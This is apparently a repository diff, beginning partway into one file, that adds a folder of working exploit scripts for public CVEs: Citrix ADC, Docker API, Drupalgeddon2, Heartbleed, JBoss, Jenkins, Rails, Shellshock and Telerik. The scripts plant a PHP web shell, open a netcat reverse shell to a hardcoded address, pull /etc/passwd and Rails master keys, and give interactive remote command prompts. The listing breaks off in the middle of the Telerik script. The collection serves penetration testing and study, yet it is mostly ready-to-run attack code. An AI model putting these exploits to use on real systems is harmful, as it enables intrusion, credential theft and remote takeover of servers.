def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), "r")
URLs_List = f_file.read().replace("\r", "").split("\n")
try:
URLs_List.remove("")
except ValueError:
pass
f_file.close()
except Exception as e:
print("Error: There was an error in reading list file.")
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
print("[%] Done.")
if __name__ == "__main__":
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)

51
CVE Exploits/Citrix CVE-2019-19781.py Normal file
View File

@ -0,0 +1,51 @@
#!/usr/bin/env python
# https://github.com/mpgn/CVE-2019-19781
# # #
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")
if len(sys.argv) < 2:
print("[-] No URL provided")
sys.exit(0)
while True:
try:
command = input("command > ")
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
print("[+] Adding bookmark", random_xml + ".xml")
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
if r.status_code == 200:
print("[+] Bookmark added")
else:
print("\n[-] Target not vulnerable or something went wrong")
sys.exit(0)
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
print("[+] Result of the command: \n")
print(replaced)
except KeyboardInterrupt:
print("Exiting...")
break

49
CVE Exploits/Docker API RCE.py Normal file
View File

@ -0,0 +1,49 @@
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
name = "docker"
description = "Docker RCE via Open Docker API on port 2375"
author = "Swissky"
# Step 1 - Extract id and name from each container
ip = "127.0.0.1"
port = "2375"
data = "containers/json"
url = "http://{}:{}/{}".format(ip, port, data)
r = requests.get(url)
if r.json:
for container in r.json():
container_id = container['Id']
container_name = container['Names'][0].replace('/','')
print((container_id, container_name))
# Step 2 - Prepare command
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
data = "containers/{}/exec".format(container_name)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
post_header = {
"Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))
# Step 3 - Execute command
id_cmd = r.json()['Id']
data = "exec/{}/start".format(id_cmd)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "Detach":false,"Tty":false}'
post_header = {
"Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))
print(r)

308
CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb Normal file
View File

@ -0,0 +1,308 @@
#!/usr/bin/env ruby
#
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'readline'
# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
# Settings - General
$useragent = "drupalgeddon2"
webshell = "s.php"
writeshell = true
# Settings - Payload (we could just be happy without this, but we can do better!)
#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Function http_post <url> [post]
def http_post(url, payload="")
uri = URI(url)
request = Net::HTTP::Post.new(uri.request_uri)
request.initialize_http_header({"User-Agent" => $useragent})
request.body = payload
return $http.request(request)
end
# Function gen_evil_url <cmd>
def gen_evil_url(evil, feedback=true)
# PHP function to use (don't forget about disabled functions...)
phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
#puts "[*] PHP cmd: #{phpmethod}" if feedback
puts "[*] Payload: #{evil}" if feedback
## Check the version to match the payload
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
if $drupalverion.start_with?('8')
# Method #1 - Drupal 8, mail, #post_render - response is 200
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
elsif $drupalverion.start_with?('7')
# Method #3 - Drupal 7, name, #post_render - response is 200
url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
else
puts "[!] Unsupported Drupal version"
exit
end
# Drupal v7 needs an extra value from a form
if $drupalverion.start_with?('7')
response = http_post(url, payload)
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
#url = $target + "file/ajax/name/%23value/" + form_build_id
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
payload = "form_build_id=" + form_build_id
end
return url, payload
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Quick how to use
if ARGV.empty?
puts "Usage: ruby drupalggedon2.rb <target>"
puts " ruby drupalgeddon2.rb https://example.com"
exit
end
# Read in values
$target = ARGV[0]
# Check input for protocol
if not $target.start_with?('http')
$target = "http://#{$target}"
end
# Check input for the end
if not $target.end_with?('/')
$target += "/"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
puts "[*] Target : #{$target}"
puts "[*] Write? : Skipping writing web shell" if not writeshell
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Setup connection
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
# Use SSL/TLS if needed
if uri.scheme == "https"
$http.use_ssl = true
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
$drupalverion = nil
# Possible URLs
url = [
$target + "CHANGELOG.txt",
$target + "core/CHANGELOG.txt",
$target + "includes/bootstrap.inc",
$target + "core/includes/bootstrap.inc",
]
# Check all
url.each do|uri|
# Check response
response = http_post(uri)
if response.code == "200"
puts "[+] Found : #{uri} (#{response.code})"
# Patched already?
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
# Try and get version from the file contents
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
# If not, try and get it from the URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
# Done!
break
elsif response.code == "403"
puts "[+] Found : #{uri} (#{response.code})"
# Get version from URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x"
else
puts "[!] MISSING: #{uri} (#{response.code})"
end
end
# Feedback
if $drupalverion
status = $drupalverion.end_with?('x')? "?" : "!"
puts "[+] Drupal#{status}: #{$drupalverion}"
else
puts "[!] Didn't detect Drupal version"
puts "[!] Forcing Drupal v8.x attack"
$drupalverion = "8.x"
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Make a request, testing code execution
puts "[*] Testing: Code Execution"
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}")
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
else
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
puts "-"*80
# Location of web shell & used to signal if using PHP shell
webshellpath = nil
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
"./",
"./sites/default/",
"./sites/default/files/",
]
# Check all
paths.each do|path|
puts "[*] Testing: File Write To Web Root (#{path})"
# Merge locations
webshellpath = "#{path}#{webshell}"
# Final command to execute
cmd = "#{bashcmd} | tee #{webshellpath}"
# Generate evil URLs
url, payload = gen_evil_url(cmd)
# Make the request
response = http_post(url, payload)
# Check result
if response.code == "200" and not response.body.empty?
# Feedback
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
# Test to see if backdoor is there (if we managed to write it)
response = http_post("#{$target}#{webshellpath}", "c=hostname")
if response.code == "200" and not response.body.empty?
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
break
else
puts "[!] Target is NOT exploitable. No write access here!"
end
else
puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
end
webshellpath = nil
end if writeshell
puts "-"*80 if writeshell
if webshellpath
# Get hostname for the prompt
prompt = response.body.to_s.strip
# Feedback
puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
elsif writeshell
puts "[!] FAILED: Coudn't find writeable web path"
puts "[*] Dropping back direct commands (expect an ugly shell!)"
end
# Stop any CTRL + C action ;)
trap("INT", "SIG_IGN")
# Forever loop
loop do
# Default value
result = "ERROR"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Exit
break if command =~ /exit/
# Blank link?
next if command.empty?
# If PHP shell
if webshellpath
# Send request
result = http_post("#{$target}#{webshell}", "c=#{command}").body
# Direct commands
else
url, payload = gen_evil_url(command, false)
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
end
end
# Feedback
puts result
end

216
CVE Exploits/Heartbleed CVE-2014-0160.py Normal file
View File

@ -0,0 +1,216 @@
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
from __future__ import print_function
from builtins import str
from builtins import range
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')
hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')
def hexdump(s, dumpf, quiet):
dump = open(dumpf,'a')
dump.write(s)
dump.close()
if quiet: return
for b in range(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print(' %04x: %-48s %s' % (b, hxdat, pdat))
print()
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
if not rdata:
return None
else:
return rdata
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print('Unexpected EOF receiving record header - server closed connection')
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print('Unexpected EOF receiving record payload - server closed connection')
return None, None, None
print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
return typ, ver, pay
def hit_hb(s, dumpf, host, quiet):
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print('No heartbeat response received from '+host+', server likely not vulnerable')
return False
if typ == 24:
if not quiet: print('Received heartbeat response:')
hexdump(pay, dumpf, quiet)
if len(pay) > 3:
print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
else:
print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
return True
if typ == 21:
if not quiet: print('Received alert:')
hexdump(pay, dumpf, quiet)
print('Server '+ host +' returned error, likely not vulnerable')
return False
def connect(host, port, quiet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not quiet: print('Connecting...')
sys.stdout.flush()
s.connect((host, port))
return s
def tls(s, quiet):
if not quiet: print('Sending Client Hello...')
sys.stdout.flush()
s.send(hello)
if not quiet: print('Waiting for Server Hello...')
sys.stdout.flush()
def parseresp(s):
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print('Server closed connection without sending Server Hello.')
return 0
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
return ver
def check(host, port, dumpf, quiet, starttls):
response = False
if starttls:
try:
s = smtplib.SMTP(host=host,port=port)
s.ehlo()
s.starttls()
except smtplib.SMTPException:
print('STARTTLS not supported...')
s.quit()
return False
print('STARTTLS supported...')
s.quit()
s = connect(host, port, quiet)
s.settimeout(1)
try:
re = s.recv(1024)
s.send('ehlo starttlstest\r\n')
re = s.recv(1024)
s.send('starttls\r\n')
re = s.recv(1024)
except socket.timeout:
print('Timeout issues, going ahead anyway, but it is probably broken ...')
tls(s,quiet)
else:
s = connect(host, port, quiet)
tls(s,quiet)
version = parseresp(s)
if version == 0:
if not quiet: print("Got an error while parsing the response, bailing ...")
return False
else:
version = version - 0x0300
if not quiet: print("Server TLS version was 1.%d\n" % version)
if not quiet: print('Sending heartbeat request...')
sys.stdout.flush()
if (version == 1):
s.send(hbv10)
response = hit_hb(s,dumpf, host, quiet)
if (version == 2):
s.send(hbv11)
response = hit_hb(s,dumpf, host, quiet)
if (version == 3):
s.send(hbv12)
response = hit_hb(s,dumpf, host, quiet)
s.close()
return response
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
print('Scanning ' + args[0] + ' on port ' + str(opts.port))
for i in range(0,opts.num):
check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
if __name__ == '__main__':
main()

62
CVE Exploits/JBoss CVE-2015-7501.py Normal file
View File

@ -0,0 +1,62 @@
#! /usr/bin/env python2
# Jboss Java Deserialization RCE (CVE-2015-7501)
# Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys, os
#from binascii import hexlify, unhexlify
from subprocess import check_output
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if not args.ysoserial_path:
for path in ysoserial_default_paths:
if os.path.exists(path):
ysoserial_path = path
else:
if os.path.exists(args.ysoserial_path):
ysoserial_path = args.ysoserial_path
if ysoserial_path is None:
print('[-] Could not find ysoserial JAR file')
sys.exit(1)
if len(args.target.split(":")) != 2:
print('[-] Target must be in format IP:PORT')
sys.exit(1)
if not args.command:
print('[-] You must specify a command to run')
sys.exit(1)
ip, port = args.target.split(':')
print('[*] Target IP: {}'.format(ip))
print('[*] Target PORT: {}'.format(port))
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
if r.status_code == 200:
print('[+] Command executed successfully')

88
CVE Exploits/Jenkins CVE-2015-8103.py Normal file
View File

File diff suppressed because one or more lines are too long

84
CVE Exploits/Jenkins CVE-2016-0792.py Normal file
View File

@ -0,0 +1,84 @@
#! /usr/bin/env python2
#Jenkins Groovy XML RCE (CVE-2016-0792)
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
#Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP:PORT')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if len(args.target.split(':')) != 2:
print('[-] Target must be in format IP:PORT')
sys.exit(1)
if not args.command:
print('[-] You must specify a command to run')
sys.exit(1)
ip, port = args.target.split(':')
print('[*] Target IP: {}'.format(ip))
print('[*] Target PORT: {}'.format(port))
xml_formatted = ''
command_list = args.command.split()
for cmd in command_list:
xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
xml_payload = '''<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
<command>
{}
</command>
<redirectErrorStream>false</redirectErrorStream>
</owner>
<resolveStrategy>0</resolveStrategy>
<directive>0</directive>
<parameterTypes/>
<maximumNumberOfParameters>0</maximumNumberOfParameters>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>'''.format(xml_formatted.strip())
print('[*] Generated XML payload:')
print(xml_payload)
print()
print('[*] Sending payload')
headers = {'Content-Type': 'text/xml'}
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
if r.status_code == 500:
for path in paths_in_trace:
if path in r.text:
print('[+] Command executed successfully')
break

32
CVE Exploits/Jenkins Groovy Console.py Normal file
View File

@ -0,0 +1,32 @@
#!/usr/bin/env python
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
from __future__ import print_function
from builtins import input
import requests
import sys
print("""
Jenkins Groovy Console cmd runner.
usage: ./jgc.py [HOST]
Then type any command and wait for STDOUT output from remote machine.
Type 'exit' to exit :)
""")
URL = sys.argv[1] + '/scriptText'
HEADERS = {
'User-Agent': 'jgc'
}
while 1:
CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
if CMD == 'exit':
print("exiting...\n")
exit(0)
DATA = {
'script': 'println "{}".execute().text'.format(CMD)
}
result = requests.post(URL, headers=HEADERS, data=DATA)
print(result.text)

5985
CVE Exploits/Log4Shell/index.html Normal file
View File

File diff suppressed because one or more lines are too long

156
CVE Exploits/Rails CVE-2019-5420.rb Normal file
View File

@ -0,0 +1,156 @@
require 'erb'
require "./demo-5.2.1/config/environment"
require "base64"
require 'net/http'
$proxy_addr = '127.0.0.1'
$proxy_port = 8080
$remote = "http://172.18.0.3:3000"
$ressource = "/demo"
puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
print "[+] Checking if vulnerable to CVE-2019-5418 => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../etc/passwd{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.body.include? "root:x:0:0:root:"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
print "[+] Getting file => credentials.yml.enc => "
path = "../../../../../../../../../../config/credentials.yml.enc{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Getting file => master.key => "
path = "../../../../../../../../../../config/master.key{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("master.key", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Decrypt secret_key_base => "
credentials_config_path = File.join("../", "credentials.yml.enc")
credentials_key_path = File.join("../", "master.key")
ENV["RAILS_MASTER_KEY"] = res.body
credentials = ActiveSupport::EncryptedConfiguration.new(
config_path: Rails.root.join(credentials_config_path),
key_path: Rails.root.join(credentials_key_path),
env_key: "RAILS_MASTER_KEY",
raise_if_missing_key: true
)
if credentials.secret_key_base != nil
puts "\033[92mOK\033[0m"
puts ""
puts "secret_key_base": credentials.secret_key_base
puts ""
end
puts "[+] Getting reflective command (R) or reverse shell (S) => "
loop do
begin
input = [(print 'Select option R or S: '), gets.rstrip][1]
if input == "R"
puts "Reflective command selected"
command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
elsif input == "S"
puts "Reverse shell selected"
command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
else
puts "No option selected"
abort
end
command_b64 = Base64.encode64(command)
print "[+] Generating payload CVE-2019-5420 => "
secret_key_base = credentials.secret_key_base
key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
secret = key_generator.generate_key("ActiveStorage")
verifier = ActiveSupport::MessageVerifier.new(secret)
if input == "R"
code = "system('bash','-c','" + command + " > /tmp/result.txt')"
else
code = "system('bash','-c','" + command + "')"
end
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
puts "\033[92mOK\033[0m"
puts ""
url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
puts url
puts ""
print "[+] Sending request => "
uri = URI(url)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "500"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
if input == "R"
print "[+] Getting result of command => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m\n\n"
puts res.body
puts "\n"
else
puts "KO"
abort
end
end
rescue Exception => e
puts "Exiting..."
abort
end
end

36
CVE Exploits/Shellshock CVE-2014-6271.py Normal file
View File

@ -0,0 +1,36 @@
#!/usr/bin/python
# Successful Output:
# # python shell_shocker.py <VulnURL>
# [+] Attempting Shell_Shock - Make sure to type full path
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse
if len(sys.argv) != 2:
print("Usage: shell_shocker <URL>")
sys.exit(0)
URL=sys.argv[1]
print("[+] Attempting Shell_Shock - Make sure to type full path")
while True:
command=input("~$ ")
opener=urllib.request.build_opener()
opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
try:
response=opener.open(URL)
for line in response.readlines():
print(line.strip())
except Exception as e: print(e)

362
CVE Exploits/Telerik CVE-2017-9248.py Normal file
View File

File diff suppressed because one or more lines are too long

140
CVE Exploits/Telerik CVE-2019-18935.py Normal file
View File

@ -0,0 +1,140 @@
#!/usr/bin/env python3
# origin : https://github.com/noperator/CVE-2019-18935
# INSTALL:
# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
# python3 -m venv env
# source env/bin/activate
# pip3 install -r requirements.txt
# Import encryption routines.
from sys import path
path.insert(1, 'RAU_crypto')
from RAU_crypto import RAUCipher
from argparse import ArgumentParser
from json import dumps, loads
from os.path import basename, splitext
from pprint import pprint
from requests import post
from requests.packages.urllib3 import disable_warnings
from sys import stderr
from time import time
from urllib3.exceptions import InsecureRequestWarning
disable_warnings(category=InsecureRequestWarning)
def send_request(files):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Connection': 'close',
'Accept-Language': 'en-US,en;q=0.5',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1'
}
response = post(url, files=files, verify=False, headers=headers)
try:
result = loads(response.text)
result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
pprint(result)
except:
print(response.text)
def build_raupostdata(object, type):
return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
def upload():
# Build rauPostData.
object = {
'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
'MaxFileSize': 0,
'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
'Ticks': 1440000000000,
'Days': 0,
'Hours': 40,
'Minutes': 0,
'Seconds': 0,
'Milliseconds': 0,
'TotalDays': 1.6666666666666666,
'TotalHours': 40,
'TotalMinutes': 2400,
'TotalSeconds': 144000,
'TotalMilliseconds': 144000000
},
'UseApplicationPoolImpersonation': False
}
type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
raupostdata = build_raupostdata(object, type)
with open(filename_local, 'rb') as f:
payload = f.read()
metadata = {
'TotalChunks': 1,
'ChunkIndex': 0,
'TotalFileSize': 1,
